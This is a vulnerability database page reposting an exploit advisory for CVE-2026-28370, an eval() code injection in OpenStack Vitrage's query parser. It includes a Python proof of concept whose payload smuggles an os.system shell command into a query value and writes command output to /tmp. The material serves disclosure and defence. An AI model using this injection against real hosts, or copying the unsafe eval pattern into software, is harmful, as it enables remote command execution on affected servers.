Vulners
Lucene search
📄 OpenStack Remote Code Execution
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | CVE-2026-28370 | 27 Feb 202604:56 | – | attackerkb |
 | March Linux Patch Wednesday | 30 Mar 202620:00 | – | avleonov |
 | CVE-2026-28370 | 27 Feb 202605:20 | – | circl |
 | OpenStack Vitrage 安全漏洞 | 27 Feb 202600:00 | – | cnnvd |
 | CVE-2026-28370 | 27 Feb 202604:56 | – | cve |
 | CVE-2026-28370 | 27 Feb 202604:56 | – | cvelist |
 | CVE-2026-28370 | 27 Feb 202604:56 | – | debiancve |
 | EUVD-2026-8999 | 27 Feb 202606:31 | – | euvd |
 | OpenStack Vitrage: Unauthorized Access to the Host can Lead to Eval Injection | 27 Feb 202606:31 | – | github |
 | CVE-2026-28370 | 27 Feb 202605:18 | – | nvd |
10
=============================================================================================================================================
| # Title : OpenStack 12.0.1, 13.0.0, 14.0.0, and 15.0.0 Vitrage Query Parser via Remote Code Execution in Unsafe eval() Usage |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.openstack.org/ |
=============================================================================================================================================
[+] Summary : CVE-2026-28370 A Remote Code Execution (RCE) vulnerability exists in the query parser of OpenStack Vitrage prior to versions 12.0.1, 13.0.0, 14.0.0, and 15.0.0.
The issue resides in the _create_query_function method located in:
vitrage/graph/query.py
The vulnerability is caused by unsafe use of Python’s eval() function when dynamically constructing query predicates. User-controlled input supplied via the Vitrage API is embedded directly into a string expression that is later executed with eval().
Because the input is not safely sanitized or parsed, an authenticated user with API access can inject arbitrary Python code. This allows execution of system-level commands on the host running the Vitrage service, under the service account privileges.
[+] POC : https://www.youtube.com/watch?v=IjBH-hu3UfQ
import os
def _evaluable_str(value):
"""Wraps the value in single quotes if it's a string."""
if isinstance(value, str):
return "'" + value + "'"
return str(value)
def create_predicate(query_dict):
"""
Simplified version of the vulnerable logic.
It builds a string and passes it to eval().
"""
key, val = list(query_dict['=='].items())[0]
expression = f"(item.get('{key}') == {_evaluable_str(val)})"
full_cmd = "lambda item: " + expression
print(f"Executing built string: {full_cmd}")
return eval(full_cmd)
malicious_payload = "') or __import__('os').system('id > /tmp/hack.txt') or ('"
query = {
"==": {
"ANY_KEY": malicious_payload
}
}
try:
match = create_predicate(query)
match({'ANY_KEY': 'Pwnd By indoushka'})
print("\n[+] Success: Check /tmp/hack.txt for the command output.")
except Exception as e:
print(f"\n[-] Failed to execute: {e}")
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Mar 2026 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.19.1
EPSS0.00763
SSVC